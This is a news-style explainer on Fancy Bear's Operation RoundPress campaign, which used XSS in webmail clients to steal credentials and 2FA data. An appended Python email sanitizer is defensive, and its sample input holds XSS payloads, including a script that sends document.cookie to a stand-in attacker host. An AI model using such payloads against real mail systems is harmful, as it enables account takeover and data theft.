Russian Hackers Launching Cyberattacks on Ukraine's Arms Suppliers: What You Need to Know
Cybercriminals Attack Ukrainian Weapons Vendors - Malicious cyber actors focus on penetrating Ukrainian weapons vendors
Get the lowdown on Fancy Bear, a notorious Russian hacker group, and their latest targeted attacks against arms companies supplying weapons to Ukraine.
Targeting Arms Suppliers
Fancy Bear, also known as Sednit or APT28, is on a mission. According to a recent study by Slovak security firm Eset, this hacker group has been launching attacks against manufacturers of Soviet-era weaponry in Bulgaria, Romania, and Ukraine. Surprisingly, arms factories in Africa and South America have also been affected. The primary objective? To disrupt the defense against Russia's invasion.
Operation RoundPress
The current espionage campaign, dubbed "Operation RoundPress," is a prime example of Fancy Bear's cunning tactics. In this campaign, the hackers have been exploiting vulnerabilities in widely used webmail software such as Roundcube, Zimbra, Horde, and MDaemon. Many of these vulnerabilities already had patches available and could have been closed with proper software maintenance. Unfortunately, in some cases the attackers used previously unknown (zero-day) vulnerabilities for which no patch yet existed.
Phishing Emails & Malware
The attacks typically begin with manipulated emails disguised as news articles from seemingly legitimate sources such as the Kyiv Post or the Bulgarian news portal News.bg; the disguise helps the messages slip past spam filters. Once such an email is opened in the webmail client in the browser, hidden JavaScript embedded in the message executes.
Bypassing Two-Factor Authentication
According to Eset researchers, the malware "SpyPress.MDAEMON" can not only read login credentials and track emails but can also bypass two-factor authentication. This second form of verification adds an extra layer of security for logging into online accounts or accessing sensitive data, but Fancy Bear has managed to bypass it in several cases, gaining persistent access to mailboxes through application passwords.
In conclusion, Fancy Bear is a formidable adversary in the world of cyber espionage. By combining technical vulnerabilities such as cross-site scripting with social engineering tactics such as spearphishing, the group is highly effective at stealing information. Keep your software up to date and be wary of suspicious emails to avoid falling victim to Fancy Bear's cunning moves.
Enrichment Data Insights:
- Spearphishing and XSS Vulnerabilities: Fancy Bear leverages spearphishing emails that exploit cross-site scripting (XSS) vulnerabilities to inject malicious JavaScript code into the webmail pages of targeted organizations.
- Exploited Software: Fancy Bear has targeted popular webmail software including Roundcube, Horde, MDaemon, and Zimbra, often exploiting known vulnerabilities with available patches, and in some cases, using zero-day vulnerabilities.
- Appearance of Legitimacy: Phishing emails often masquerade as legitimate news reports from reputable sources to bypass spam filters.
- Data Exfiltration: Once the email clients are compromised, Fancy Bear deploys a custom JavaScript payload to steal sensitive data, including login credentials, address book contacts, and message history.
- 2FA Exfiltration: In some cases, attackers have managed to exfiltrate two-factor authentication information, potentially allowing them to bypass two-factor authentication (2FA) if the stolen credentials are used before the 2FA codes expire. However, the malware itself is not persistent: it relies on the victim reopening the malicious email to reload the attack.
- Operation RoundPress, the ongoing cyber espionage campaign, shows Fancy Bear's skilful combination of spearphishing and cross-site scripting (XSS): emails are made to look like news articles from credible sources and are used to inject malicious JavaScript into webmail pages.
- Defending against Fancy Bear means keeping a close watch on popular webmail software such as Roundcube, Horde, MDaemon, and Zimbra, since the group has exploited both known vulnerabilities with available patches and zero-day vulnerabilities.
- In the realm of cyber war and conflict, it is essential to stay vigilant against phishing emails that look harmless but can slip past spam filters and compromise your systems, as seen in the attacks on arms suppliers in several European countries and beyond.
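As an added illustration that is not part of the article, nor code from any of the webmail products it names: the defensive counterpart to the XSS-via-HTML-email technique described above is to render a message body only after an allow-list sanitizer has removed all active content. The Python below (standard library only) does that and, because it records every element or attribute it removed, also serves as a detection check a mail gateway could run; the sample message body is constructed for this example.

```python
from html import escape
from html.parser import HTMLParser

# Constructed sample (not from the article): a script block, an event handler, a javascript: link.
SAMPLE_EMAIL_HTML = (
    '<p>Breaking news from <a href="https://example.invalid/article">the site</a></p>'
    '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'
    '<img src="x" onerror="alert(1)">'
    '<a href="javascript:void(0)">read more</a>'
)
# Elements dropped with their content, URL-valued attributes, and the only schemes allowed (cid: = inline attachment).
DROP_TAGS = {"script", "style", "iframe", "object", "embed", "form", "meta", "link", "base", "svg", "math"}
URL_ATTRS = {"href", "src", "action", "formaction", "background"}
SAFE_SCHEMES = ("http://", "https://", "mailto:", "cid:")


class EmailSanitizer(HTMLParser):
    """Rebuilds the message body without active content and records each removal."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.findings, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_TAGS:
            self.findings.append(f"dropped <{tag}> element")
            self._skip += 1  # discard this element and everything nested in it
            return
        if self._skip:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name == "style":  # event handlers and inline CSS
                self.findings.append(f"dropped {name}= attribute on <{tag}>")
            elif name in URL_ATTRS and not value.strip().lower().startswith(SAFE_SCHEMES):
                self.findings.append(f"dropped {name}={value!r} on <{tag}>")  # javascript:, data:, relative
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_TAGS:
            self._skip = max(self._skip - 1, 0)
        elif not self._skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data))  # text is re-escaped, never emitted raw


def sanitize_html_email(html):
    """Return (clean_html, findings) for one HTML message body."""
    parser = EmailSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.findings
```

A non-empty findings list on an inbound message is itself a signal worth logging, since legitimate newsletters rarely need script blocks or event handlers.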